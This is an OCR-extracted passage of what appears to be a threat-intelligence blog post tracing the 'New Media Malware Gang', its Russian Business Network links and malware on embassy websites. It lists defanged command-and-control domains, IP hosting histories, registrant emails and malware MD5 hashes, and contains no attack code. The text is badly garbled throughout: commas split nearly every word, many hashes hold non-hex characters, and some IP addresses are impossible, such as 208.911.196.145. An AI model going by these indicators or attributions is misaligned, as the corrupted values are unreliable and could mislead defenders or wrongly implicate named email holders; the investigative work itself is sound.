tivities, including, the, direct, establishing, of, a, direct, connection, between, the, [2]Russian, 
Business, Network, the, [3]New, Media, Malware, gang, including, a, variety, of, high, profile, 
Web, site, compromise, campaigns. 


What’s, particularly, interesting, about, the, group’s, activities, is, the, fact, that, back, 
in, 2007, the, group’s, activities, used, to, dominate, the, threat, landscape, in, a, targeted, 
fashion, including, the, active, utilization, of, client-side, exploits, and, the, active, exploita- 
tion, of, legitimate, Web, sites, successfully, positioning, the, group, including, the, Russian, 
Business, Network, as, a, leading, provider, of, malicious, activities, online, leading, to, a, 
series, of, analyses, successfully, detailing, the, activities, of, the, group, including, the, direct, 
establishing, of, a, connection, between, the, New, Media, Malware, Gang, the, Russian, 
Business, Network, and, the, Storm, Worm, botnet. 
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In, this, post, I'll, provide, a, detailed, analysis, of, the, group’s, activities, discuss, in, 
the, depth, the, tactics, techniques, and, procedures, (TTPs), of, the, group, including, a, 
direct, establishing, of, a, connection, between, the, New, Media, Malware, Gang, the, Russian, 
Business, Network, and, the, direct, compromise, of, a, series, of, high, profile, Web, site, 
compromise, campaigns. 


Having, successfully, tracked, down, and, profiled, the, group’s, activities, for, a, period, 
of, several, years, and, based, on, the, actionable, intelligence, provided, regarding, the, 
group’s, activities, we, can, easily, establish, a, direct, connection, between, the, New, Media, 
Malware, Gang, and, the, Russian, Business, Network, including, a, series, of, high, profile, 
Web, site, compromise, campaigns. 


Key Summary Points: 


- RBN Connection, New Media Malware Gang connection - "ai siktir" "Die()", money mule 
recruitment, money laundering of virtual currency 


- Actionable CYBERINT data to assist law enforcement, academics and the private sector 
in ongoing or past cybercrime investigations 


- Complete domain portfolios registered up to the present day using the same emails 
used to register the malicious domains during 2007-2009 to assist law enforcement, aca- 
demics and the private sector in catching up with their malicious activities over the years 


- Detailed analysis of each and every campaign’s domain portfolios (up to present day) 
further dissecting the fraudulent schemes launched by the same cybercriminals that embed- 
ded malware on the embassies’ web sites 


- Complete IP Hosting History for each and every of the malicious domains/command 
and control servers during the time of the attack 


- The "Big Picture" detailing the interconnections between the campaigns, with historical 
OSINT data pointing to the "New Media Malware Gang", back then customers of the Russian 
Business Network 


Let’s, profile, the, group’s, activities, including, a, direct, establishing, of, a, connection, 
between, the, Russian, Business, Network, the, New, Media, Malware, Gang, and, the, Storm, 
Worm, botnet. 


In, 2007, |, 


[4]profiled 
5513 


, the, direct, compromise, of, the, Syrian, Embassy, in, London, including, a, related, com- 
promise of, the, [5]USAID.gov compromised, malware and exploits served, the, [6]U.S 
Consulate St. Petersburg Serving Malware, [7]Bank of India Serving Malware, [8]French 
Embassy in Libya Serving Malware, [9]Ethiopian Embassy in Washington D.C Serving Malware, 
[10]Embassy of India in Spain Serving Malware, [11]Azerbaijanian Embassies in Pakistan 
and Hungary Serving Malware, further, detailing, the, malicious, activities, of, the, Russian, 
Business, Network, and, the, New, Media, Malware, Gang. 


Let’s profile, the, campaigns, and, discuss, in, depth, the, direct, connection, between, 
the, group’s, activities, the, Russian, Business, Network, and, the, New, Media, Malware, Gang. 


sicil.info - on 2007-09-26 during the time of the attack, the domain was registered us- 
ing the srvs4you@gmail.com email. The domain name first appeared online on 2006-06-10 
with an IP 213.186.33.24. On 2007-07-11, it changed IPs to 203.121.79.71, followed by another 
change on 2008-01-06 to 202.75.38.150, another change on 2008-05-06 to 203.186.128.154, 
yet another change on 2008-05-18 to 190.183.63.103, and yet another change on 2008-07-27 
to 190.183.63.56. 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (sicil.info): 


MD5: 4802db20da46fca2a1896d4c983b13ba 
MD5: f9434d86ef2959670b73a79947b0f4d2 

MD5: 32dba64ae55e7bb4850e27274da42d1b 
MD5: cd6a7ff6388fbd94b7ee9cdc88ca8f4d 


MD5: 57dff9e8154189f0a09fb62450decac6 


Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (sicil.info), are, 
also, the, following, malicious, domains: 


hxxp://144.217.69.62 
hxxp://63.246.128.71 
hxxp://207.150.177.28 


hxxp://66.111.47.62 
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hxxp://66.111.47.4 


hxxp://66.111.47.8 


Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs (213.186.33.24): 


MD5: la08cOce5ab15e6fd8f52cd99eab64acb 

MD5: 95cc3a0243aa050243ab858794cl1d221 
MD5: cc63d67282789e03469f2e6520c6de80 
MD5: 3829506c454b86297d2828077589cbf8 


MD5: 1e18b17149899d55d3625d47135a22a7 


Once, executed, a, sample, malware (MD5: la08cOce5ab15e6fd8f52cd99ea64acb), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://ioasis.org - 208.112.115.36 
hxxp://polyhedrusgroup.com - 143.95.229.33 
hxxp://espoirsetvie.com - 213.186.33.24 
hxxp://ladiesdehaan.be - 185.59.17.113 
hxxp://chonburicoop.net - 27.254.96.151 


hxxp://ferienwohnung-walchensee-pur.de - 109.237.138.48 


Related posts: [12]Dissecting a Sample Russian Business Network (RBN) Contract/Agreement 
Through the Prism of RBN’s AbdAllah Franchise 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (Oki.ru; 89.179.174.156): 


MD5: cd33ea55b2d13df592663f18e6426921 


MD5: 8e0c7757b82d14b988afac075e8ed5dc 
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MD5: e6aaafcafdd0a20d6dbe7f8cObf4d012 
MD5: e513a1b25e59670f777398894dfe41b6 
MD5: Ofad43c03d80aleb3a2clae9e9ab6c9ed 
MD5: 6e1b789f0df30ba0798fbc47cbicecic 


MD5: 9f02232ed0ee609c8db1b98325beaa94 


Once, executed, a, sample, malware (MD5: e6aaafcafdd0a20d6dbe7f8cObf4d012), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://lordofthepings.ru (173.254.236.159) 
hxxp://poppylols.ru 
hxxp://chuckboris.ru 
hxxp://kosherpig.xyz 
hxxp://ladyhaha.xyz 
hxxp://porkhalal.site 
hxxp://rihannafap.site 
hxxp://bieberfans.top 
hxxp://runands.top 
hxxp://frontlive.net 
hxxp://offerlive.net 
hxxp://frontserve.net 
hxxp://offerserve.net 
hxxp://hanghello.ru 
hxxp://hanghello.net 
hxxp://septemberhello.net 
hxxp://hangmine.net 


hxxp://septembermine.net 
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hxxp://hanglive.net 
hxxp://wrongserve.ru 
hxxp://wrongserve.net 


hxxp://madelive.net 


Once, executed, a, sample, malware (MD5: e513a1b25e59670f777398894dfe41b6), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 173.254.236.159 
hxxp://yardlive.ru 

hxxp://yardlive.net 

hxxp://musiclive.net - 141.8.225.124 
hxxp://yardserve.net 
hxxp://musicserve.net - 185.53.177.20 
hxxp://wenthello.net 
hxxp://spendhello.ru 
hxxp://wentmine.net 
hxxp://spendmine.net 
hxxp://spendhello.net 

hxxp://joinlive.net 

hxxp://wentserve.ru 
hxxp://hanghello.net 


hxxp://joinhello.net 


hxxp://X12345.org - 46.4.22.145 
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Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (miron555.org): 


MD5: 0€423596c502cle28cce0c98df2a2b6d 
MD5: e75d92defbllafe50a8cc51dfe4fb6ee 

MD5: adcedd763f541e625f91030ee4de7c19 
MD5: 2c664a4c1374b3d887f59599704aef6c 
MD5: 2c664a4c1374b3d887f59599704aef6c 


MD5: 0e€423596c502cle28cce0c98df2a2b6d 


Over the years (up to present day) srvs4you@gmail.com is also known to have been 
used to register the following domains: 


hxxp://10lann10.org 
hxxp://24cargo.net 
hxxp://ace-assist. biz 
hxxp://activation-confirm.com 
hxxp://adwoords.net 
hxxp://alert-careerbuilder.com 
hxxp://annebehnert.info 
hxxp://apollo-services.net 
hxxp://appolage.org 
hxxp://auctions-ukash.com 
hxxp://bbcfinancenews.com 
hxxp://bestgreatoffers.org 
hxxp://blackbird-registration.com 


hxxp://bloomborg.biz 
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hxxp://businessprocl.com 
hxxp://bussolutionsinc.org 
hxxp://calisto-trading.com 
hxxp://calisto-trading.net 
hxxp://calisto-trading.org 
hxxp://candy-country.com 
hxxp://casheq.com 
hxxp://cfca-usa.com 
hxxp://cfodaily. biz 
hxxp://citizenfinancial.net 
hxxp://citylending.net 
hxxp://clean2mail.com 
hxxp://confirm-activation.com 
hxxp://consultingwiz.org 
hxxp://courierusa-online.com 
hxxp://cristhmasx.com 
hxxp://d-stanley.net 
hxxp://dariazacherl.info 
hxxp://des-group.com 
hxxp://digital-investment-projects.com 
hxxp://dns4your.net 
hxxp://dvasuka.com 
hxxp://easy-midnight.com 
hxxp://easy-transfer. biz 


hxxp://easymidnight.com 
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hxxp://ecareerstyle.com 
hxxp://ecnoho.com 
hxxp://efinancialnews. biz 
hxxp://eluxuryauctions.com 
hxxp://elx-Itd.net 
hxxp://elx-trading.org 
hxxp://elxitd.net 
hxxp://emoney-ex.com 
hxxp://epsincorp.net 
hxxp://equitrust.org 
hxxp://erobersteng.com 
hxxp://erxlogistics.com 
hxxp://esdeals.com 
hxxp://estemaniaks.com 
hxxp://eu-bis.com 
hxxp://eu-cellular.com 
hxxp://eubiz.org 
hxxp://euwork.org 
hxxp://expressdeal.info 
hxxp://ezado.net 
hxxp://fairwaylending.org 
hxxp://fan-gaming.org 
hxxp://fcinternatonall.com 
hxxp://fidelitylending.net 


hxxp://financial-forbes.com 
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hxxp://financialnews-us.net 
hxxp://firstcapitalgroup.org 
hxxp://freemydns.org 
hxxp://fremontlending.net 
hxxp://fresh-solutions-mail.com 
hxxp://fresh-solutions.us 
hxxp://garnantfoundation.com 
hxxp://gazenvagen.com 
hxxp://globerental.com 
hxxp://googmail.biz 
hxxp://i-expertadvisor.com 
hxxp://icebart.com 
hxxp://icqdosug.com 
hxxp://iesecurityupdates.com 
hxxp://indigo-consulting.org 
hxxp://indigo-job-with-us.com 
hxxp://indigojob.com 
hxxp://indigovacancies.com 
hxxp://inncoming.com 
hxxp://ivsentns.com 
hxxp://iwiwlive.net 
hxxp://iwiwonline.net 
hxxp://jobs-in-eu.org 
hxxp://kelermaket.com 


hxxp://kklfnews.com 
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hxxp://knses.com 
hxxp://komodok.com 
hxxp://krdns.biz 
hxxp://ksfcnews.com 
hxxp://ksfcradio.com 
hxxp://ktes314.org 
hxxp://Ida-import.com 
hxxp://legal-solutions.org 
hxxp://Igcareer.com 
hxxp://Igtcareer.com 
hxxp://librarysp.com 
hxxp://littlexz.com 
hxxp://mariawebber.org 
hxxp://megamule.net 
hxxp://moneycnn. biz 
hxxp://njnk.net 
hxxp://ns4ur.net 
hxxp://nytimesnews. biz 
hxxp://o2cash.net 
hxxp://offsoftsolutions.com 
hxxp://pcpro-tostumm.com 
hxxp://perfect-investments.org 
hxxp://progold-inc. biz 
hxxp://protectedsession.com 


hxxp://razsuka.com 
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hxxp://reutors.biz 
hxxp://rushop.us 
hxxp://science-and-trade.com 
hxxp://secure-operations.org 
hxxp://securesitinngs.com 
hxxp://servicessupport. biz 
hxxp://sessionprotected.com 
hxxp://sicil.info 


hxxp://sicil256.info 


hxxp://simple-investments-mail.org 


hxxp://simple-investments.net 
hxxp://simple-investments.org 
hxxp://sp3library.com 
hxxp://speeduserhost.com 
hxxp://storempire.com 
hxxp://tas-corporation.com 
hxxp://tas-corporation.net 
hxxp://tascorporation.net 
hxxp://topixus.net 
hxxp://tsrcorp.net 
hxxp://u-file.org 
hxxp://ukashauction.net 
hxxp://ultragame.org 
hxxp://unitedfinancegroup.org 


hxxp://vanessakoepp.org 
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hxxp://verymonkey.com 
hxxp://vesa-group.com 
hxxp://vesa-group.net 
hxxp://vipvipns.net 
hxxp://vipvipns.org 
hxxp://wondooweria.com 
hxxp://wondoowerka.com 
hxxp://wootpwnseal.com 
hxxp://worldeconomist.biz 
hxxp://wumtt-westernunion.com 
hxxp://xsoftwares.com 
hxxp://xxx2008xxx.com 
hxxp://yourcashlive.com 
hxxp://yourlive. biz 


hxxp://yourmule.com 


On 2008-09-25 Oki.ru was registered using the kseninkopetr@nm.ru email. The same 
email address is not known to have been used to register any additional domains. 


On 2008-06-19 x12345.org was registered using the xix.x12345@yahoo.com email. On 
2007-09-10 the domain use to respond to 66.36.243.97, then on 2007-11-13 it changed IPs 
to 58.65.236.10, following another change on 2008-05-06 to 203.186.128.154. No other 
domains are known to have been registered using the same email address. 


On 2007-06-07, miron555.org was registered using the mironbot@gmail.com email, fol- 
lowed by another registration email change on 2008-02-12 to nepishite555suda@gmail.com. 
On 2007-04-24, the domain responded to 75.126.4.163. It then changed IPs on 2007-05-09 
to 203.121.71.165, followed by another change on 2007-06-08 to 58.65.239.247, yet another 
change on 2007-07-15 to 58.65.239.10, another change on 2007-08-19 to 58.65.239.66, more 
IP changes on 2007-09-03 to 217.170.77.210, and yet another change on 2007-09-18 to 
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88.255.90.138. 


Historically (up to present day), mironbot@gmail.com is also known to have been used 
to register the following domains: 


hxxp://24-7onlinepharmacy.net 
hxxp://bestmoviesonline.info 
hxxp://brightstonepharma.com 
hxxp://deapotheke.com 
hxxp://dozor555.info 
hxxp://my-traff.cn 
hxxp://pharmacyit.net 
hxxp://trffc.org 

hxxp://trffc3.ru 


hxxp://xmpharm.com 


In, 2008, I, profiled, the, direct, compromise, of, [13]The Dutch Embassy in Moscow Serving 
Malware, further, detailing, the, malicious, and, activity, of, the, Russian, Business, Network, 
and, the, New, Media, Malware, Gang. 


Let’s, profile, the, campaign, and, discuss, in-depth, the, direct, connection, between, 
the, group’s, activities, and, the, direct, compromise, of, the, Embassy’s Web, site. 


On 2009-03-04, Imifsp.com was registered using the redemption@snapnames.com email. 
On 2007-11-30, it used to respond to 68.178.194.64, then on 2008-12-01 it changed IPs to 
68.178.232.99. 


In, 2008, |, profiled, the, direct, compromise, of, [14]Embassy of Brazil in India Compro- 
mised, further, establishing, a, direct, connection, between, the, group’s, activities, and, the, 
Russian, Business, Network. 
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Let’s, profile, the, campaign, and, discuss, in-depth, the, direct, connection, between, 
the, group’s, activities, and, the, Russian, Business, Network. 


hxxp://google-analyze.com - 87.118.118.193 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (google-analyze.com - 87.118.118.193): 


MD5: 2bcb74c95f30e3741210cO0de0c1b406f 


On 2008-10-15, traff.asia was registered using the traffon@gmail.com email. 


On 2008-06-19, google-analyze.com was registered using the incremental@list.ru email. On 
2007-12-21 it responded to 66.36.241.153, then it changed IPs on 2007-12-22 to 66.36.231.94, 
followed by another change on 2008-02-03 to 79.135.166.74, then to 195.5.116.251 on 2008- 
03-16, to 70.84.133.34 on 2008-07-31, followed by yet another change to 216.195.59.77 on 
2008-09-15. 


On 2008-08-05, google-analystic.net, is, Known, to, have, responded, to, 212.117.163.162, 
and, was registered using the abusecentre@gmail.com email. On 2008-04-11 it used to 
respond to 64.28.187.84, it then changed IPS to 85.255.120.195 on 2008-08-03, followed by 
another change on 2008-08-10 to 85.255.120.194, then to 85.255.120.197 on 2008-09-07, 
to 69.50.161.117 on 2008-09-14, then to 66.98.145.18 on 2008-10-11, followed by another 
change on 2008-10-25 to 209.160.67.56. 


On 2008-11-11, beshragos.com was registered using the migejosh@yahoo.com email. 
On 2008-11-11 it used to respond to 79.135.187.38. 


In, 2009, |, profiled, the, direct, compromise, of, [15]Ethiopian Embassy in Washington 
D.C Serving Malware, further, detailing, the, group’s, activities, further, establishing, a, direct, 
connection, between, the, group’s, activities, and, the, Russian, Business, Network. 
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Let’s, profile, the, campaign, and, discuss, in-depth, the, direct, connection, between, 
the, group’s, activities, and, the, Russian, Business, Network. 


On 2009-01-19, 1tvv.com is, known, to, have, responded, to, 69.172.201.153; 
66.96.161.140; 122.10.52.139; 122.10.18.138; 67.229.44.15; 
74.200.250.130; 69.170.135.92; 64.74.223.38, and, was registered using the 
mogensen@fontdrift.com email. 


On 2005-08-27, the domain (1tvv.com) is, known, to, have, responded to 
198.65.115.93, then on 2006-05-12 to 204.13.161.31, with yet another IP 
change on 2010-04-08 to 216.240.187.145, followed by yet another change 
on 2010-06-02 to 69.43.160.145, then on 2010-07-25 to 69.43.160.145. 


On 2010-01-04, trafficinc.ru was registered using the auction@r01.ru email. 


On 2009-03-01, trafficmonsterinc.ru was registered using the trafficmonsterinc.ru@r01- 
service.ru email. 


On 2009-05-02, us18.ru, is, Known, to, have, responded, to, 109.70.26.37; 185.12.92.229; 
109.70.26.36, and, was registered using the belyaev _andrey@inbox.ru email. 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: 06545cd12231d0a4239ce837cd371166 
MD5: dae41c862130daebcff0e463e2c30e50 
MD5: 601806c0a01926c2a94558148764797a 
MD5: 45f97cd8df4448bbe073a38c264ef93f 


MD5: 94aeba45e6fb4d17baa4989511e321b3 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (69.172.201.153): 
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MD5: 4e0ce2f9f92ac5193c2a383de6015523 
MD5: a38d47fcfdafl4372cea3de850cf487d 

MD5: 014d2flbae3611e016f96a37f98fd4b7 
MD5: daad60cb300101dc05d2ff922966783b 


MD5: 0a775110077e2c583be56e5fb3fa4f09 


Once, executed, a, sample, malware (MD5: 4e0ce2f9f92ac5193c2a383de6015523), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://pelcpawel.fm.interia.pl - 217.74.66.160 
hxxp://pelcpawel.fm.interiowo.pl - 217.74.66.160 
hxxp://chicostara.com - 91.142.252.26 
hxxp://suewyllie.com 

hxxp://dewpoint-eg.com - 195.157.15.100 


hxxp://sso.anbtr.com - 195.22.28.222 


Once, executed, a, sample, malware (MD5: a38d47fcfdaf14372cea3de850cf487d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://ledyazilim.com - 213.128.83.163 
hxxp://ksandrafashion.com - 166.78.145.90 
hxxp://lafyeri.com - 69.172.201.153 
hxxp://kulppasur.com - 52.28.249.128 


hxxp://toalladepapel.com.ar 


hxxp://trafficinc.ru, is, known, to, have, responded, to, 222.73.91.203 


hxxp://trafficmonsterinc.ru, is, known, to, have, responded, to, 178.208.83.7; 178.208.83.27; 
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91.203.4.112 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: ce4e2e12ee16d5bde67a3dc2e3da634b 
MD5: 4423e04fb3616512bf98b5a565fccdd7 

MD5: 33f890c294b2ac89d1ee657b94e4341d 
MD5: 1c5096c3ce645582dd18758fe523840a 


MD5: lefaeObOcb06faacae46584312a12504 


Once, executed, a, sample, malware (MD5: ce4e2e12ee16d5bde67a3dc2e3da634b), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://rms-server.tektonit.ru - 109.234.156.179 


hxxp://365invest.ru - 178.208.83.7 


Once, executed, a, sample, malware (MD5: 4423e04fb3616512bf98b5a565fccdd7), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://topstat.mcdir.ru - 178.208.83.7 


Once, executed, a, sample, malware (MD5: 33f890c294b2ac89d1ee657b94e4341d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://cadretest.ru - 178.208.83.7 


Once, executed, a, sample, malware (MD5: 1c5096c3ce645582dd18758fe523840a), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://pelcpawel.fm.interia.pl - 217.74.65.161 
hxxp://testtrade.ru - 178.208.83.7 


hxxp://chicostara.com - 91.142.252.26 
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In, 2009, |, profiled, the, direct, compromise, of [16]Embassy of India in Spain Serving 
Malware, further, detailing, the, malicious, activity, further, establishing, a, direct, connection, 
between, the, group’s, activities, and, the, Russian, Business, Network. 


On 2008-09-07, msn-analytics.net was registered using the 
palfreycrossvw@gmail.com email. On 2007-06-17 it used to respond to 
82.98.235.50, it then changed IPs on 2008-09-07 to 58.65.234.9, followed 
by another change on 2009-11-14 to 96.9.183.149, then to 96.9.158.41 on 
2009-12-29, and to 85.249.229.195 on 2010-03-09. 


On 2008-07-10, pinoc.org 

was registered using the 4ykakabra@gmail.com email. On 2008-07-10 it 
responded to 58.65.234.9, it then changed IPs on 2008-08-17 to 
91.203.92.13, followed by another change on 2008-08-24 to 58.65.234.9, 
followed by yet another change to 208.73.210.76 on 2009-10-03, and yet 
another change on 2009-10-06 to 96.9.186.245. 


On 2008-09-20, wsxhost.net 

was registered using the palfreycrossvw@gmail.com email. On 2008-09-20 
wsxhost.net responded to 58.65.234.9, it then changed IPs on 2008-12-22 
to 202.73.57.6, followed by another change on 2009-05-18 to 
202.73.57.11, yet another change on 2009-06-22 to 92.38.0.66, then to 
91.212.198.116 on 2009-07-06, yet another change on 2009-08-17 to 
210.51.187.45, then to 210.51.166.239 on 2009-08-25, and finally to 
213.163.89.54 on 2009-09-05. 


On 2008-06-29 google-analyze.cn was registered using the johnvernet@gmail.com email. 


Historically (up to present day) johnvernet@gmail.com is known to have registered the 
following domains: 


hxxp://baidustatz.com 
hxxp://edcomparison.com 


hxxp://google-analyze.org 
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hxxp://google-stat.com 
hxxp://kolkoman.com 
hxxp://m-analytics.net 
hxxp://pinalbal.com 
hxxp://pornokman.com 
hxxp://robokasa.com 
hxxp://rx-white.com 
hxxp://sig4forum.com 
hxxp://thekapita.com 


hxxp://visittds.com 


msn-analytics.net, is, known, to, have, responded, to, 216.157.88.21; 85.17.25.214; 
216.157.88.22; 85.17.25.215; 85.17.25.202; 216.157.88.25; 5.39.99.49; 167.114.156.214; 
5.39.99.50; 66.135.63.164; 85.17.25.242; 69.43.161.210 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: eb95798965a18e7844f4c969803fbaf8 
MD5: 106b6e80be769fa4a87560f82cd24b57 
MD5: 519a9f1cb16399c515723143bf7ff0d0 
MD5: 6537c3d65ecc8acOf3cd8d6bf3556da5 


MD5: 613e8c31ledf4dalb8f8de9350al186f41 


Once, executed, a, sample, malware (MD5: eb95798965a18e7844f4c969803fbaf8), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://vboxsvr.ovh.net 


hxxp://thinstall.abetterinternet.com - 85.17.25.214 
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hxxp://survey-winner.net - 94.229.72.117 
hxxp://survey-winner.net - 208.911.196.145 


hxxp://comedy-planet.com 


Once, executed, a, sample, malware (MD5: 106b6e80be769fa4a87560f82cd24b57), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://memberfortieth.net 
hxxp://beginadvance.net 
hxxp://knownadvance.net 
hxxp://beginstranger.net 


hxxp://knownstranger.net - 23.236.62.147 


Once, executed, a, sample, malware (MD5: b537c3d65ecc8acOf3cd8d6bf3556da5), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://followfortieth.net 
hxxp://memberfortieth.net 
hxxp://beginadvance.net 
hxxp://knownadvance.net 
hxxp://beginstranger.net 


hxxp://knownstranger.net - 23.236.62.147 


pinoc.org, is, Known, to, have, responded, to, 103.224.212.222; 185.53.179.24; 185.53.179.9; 
185.53.177.10; 188.40.174.81; 46.165.247.18; 178.162.184.130 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: 000125b0d0341fc078c7bdb5b7996f9e 
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MD5: b3bbeaca85823d5c47e36959b286bb22 
MD5: 4faa9445394ba4edf73dd67e239bcbca 
MD5: 9f3b9de8a3e7cd8ee2d779396799b17a 


MD5: 38d07b2a1189eb1fd64296068fbaf08a 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://os.onlineapplicationsdownloads.com - 103.224.212.222 
hxxp://static.greatappsdownload.com - 54.230.187.48 
hxxp://ww1.os.onlineapplicationsdownloads.com - 91.195.241.80 
hxxp://os2.onlineapplicationsdownloads.com - 103.224.212.222 


hxxp://ww1.o0s2.onlineapplicationsdownloads.com - 91.195.241.80 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://errors.myserverstat.com - 103.224.212.222 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://scripts.dlv4.com - 103.224.212.222 


hxxp://ww38.scripts.dlv4.com - 185.53.179.29 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://complaintsboard.com - 208.100.35.85 
hxxp://7ew8gov.firoli-sys.com - 103.224.212.222 


hxxp://yx-vom2s.hdmediastore.com - 45.33.9.234 
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hxxp://q8x3kb.wwwmediahosts.com - 204.11.56.48 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://newworldorderreport.com - 50.63.202.29 
hxxp://69jh93.firoli-sys.com - 103.224.212.222 
hxxp://bpvv11ndq5.wwwmediahosts.com - 204.11.56.48 


hxxp://Odbhwuja.hdmediastore.com - 45.33.9.234 


wsxhost.net, is, known, to, have, responded, to, 184.168.221.45; 50.63.202.82; 69.43.161.172 


Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs: 


MD5: 117036e5a7b895429e954f733e0acada 
MD5: 1172e5a2ca8a43a2a2274f2c3b76a7be 
MD5: 6€330742d22c5a5e99e6490de65fabd6 
MD5: fl1c9cd766817ccf55e30bb8af97bfdbb 


MD5: 7f4145bc211089d9d3c666078c35cf3d 


Once, executed, a, sample, malware (MD5: 117036e5a7b895429e954f733e0acada), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://amacweb.org 
hxxp://superaffiliatehookup.com 
hxxp://germanamericantax.com 
hxxp://lineaidea. it 


hxxp://speedysalesletter.com 
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Once, executed, a, sample, malware (MD5: 1172e5a2ca8a43a2a2274f2c3b76a7be), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://allstatesdui.com - 50.63.202.36 
hxxp://wellingtontractorparts.com - 72.167.232.158 
hxxp://amacweb.org - 160.16.211.99 


hxxp://nctcogic.org - 207.150.212.74 


Once, executed, a, sample, malware (MD5: 6e330742d22c5a5e99e6490de65fabd6), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://santele.be - 176.62.170.69 
hxxp://fever98radio.com - 141.8.224.93 
hxxp://brushnpaint.com - 74.220.219.132 
hxxp://jameser.com - 54.236.195.15 


hxxp://hillsdemocrat.com - 67.225.168.30 


Once, executed, a, sample, malware (MD5: f1c9cd766817ccf55e30bb8af97bfdbb), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 109.70.26.37 
hxxp://afterpeace.net - 195.38.137.100 


hxxp://sellhouse.net - 184.168.221.45 


Once, executed, a, sample, malware (MD5: 7f4145bc211089d9d3c666078c35cf3d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 109.70.26.37 


hxxp://forcerain.net 
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hxxp://afterrain.net - 50.63.202.43) 
hxxp://forcerain.ru 


hxxp://forceheld.net 


google-analyze.cn, is, known, to, have, responded, to, 103.51.144.81; 184.105.178.89; 
65.19.157.235; 124.16.31.146; 123.254.111.190; 103.232.215.140; 103.232.215.147; 
205.164.14.78; 50.117.116.117; 50.117.120.254; 205.164.24.45; 50.117.116.205; 
50.117.122.90; 184.105.178.84; 50.117.116.204 


Related malicious MD5s known to have phoned back to the same malicious C &C, server, IPs: 
MD5: df05460b5e49cbba275f6d5cbd936d1d 

MD5: 7732ffcf2f4cf1d834b56df1f9d815c9 

MD5: 615eb515dal18feb2b87c0fb5744411ac 

MD5: 24fec5b3acld20e61f2a3de95aeb177c 


MD5: 348eed9b371ddb2755eb5c2bfaa782ee 


On 2008-08-27, yahoo-analytics.net was registered using the fuadrenalray@gmail.com 
email. 


- google-analyze.org - Email: johnvernet@gmail.com - on, 2008-07-09, google-analyze.org 
, is, Known, to, have, responded, to, 58.65.234.9, followed, by, a, hosting, change, on, 
2008-08-17, with, google-analyze.org, responding, to, 91.203.92.13, followed, by, another, 
hosting, change, on, 2008-08-24, with, google-analyze.org, responding, to, 202.73.57.6. 


- qwehost.com - Email: 4ykakabra@gmail.com - on, 2009-05-18, qwehost.com, is, known, 
to, have, responded, to, 202.73.57.11, followed, by, a, hosting, change, to, 202.73.57.11, 
followed, by, another, hosting, change, on, 2009-06-22, pointing, to, 92.38.0.66, followed, 
by, yet, another, hosting, change, pointing, to, 91.212.198.116, followed, by, yet, another, 
hosting, change, on, 2009-08-17, pointing, to, 210.51.187.45. 


5536 


- zxchost.com - Email: 4ykakabra@gmail.com - on, 2009-03-02, zxchost.com, is, Known, 
to, have, responded, to, 202.73.57.6, followed, by, a, hosting, change, on, 2009-05-18, 
pointing, to, 202.73.57.11, followed, by, yet, another, hosting, change, on, 2009-06-22, 
pointing, to, 92.38.0.66, followed, by, yet, another, hosting, change, on, 2009-08-25, pointing, 
to, 210.51.166.239. 


- odile-marco.com - Email: OdileMarcotte@gmail.com - on, 2009-05-18, odile-marco.com, 
is, Known, to, have, responded, to, 202.73.57.6, followed, by, a, hosting, change, on, 2009-06- 
22, pointing, to, 202.73.57.11, followed, by, yet, another, hosting, change, on, 2009-07-06, 
pointing, to, 92.38.0.66, followed, by, yet, another, hosting, change, on, 2009-08-17, pointing, 
to, 911.212.198.116. 


- edcomparison.com - Email: johnvernet@gmail.com - on, 2009-05-18, edcomparison.com, is, 
known, to, have, responded, to, 202.73.57.6, followed, by, a, hosting, change, on, 2009-06-22, 
pointing, to, 202.73.57.11, followed, by, yet, another, hosting, change, on, 2009-07-13, this, 
time, pointing, to, 92.38.0.66, followed, by, yet, another, hosting, change, on, 2009-08-17, 
this, time, pointing, to, 210.51.187.45. 


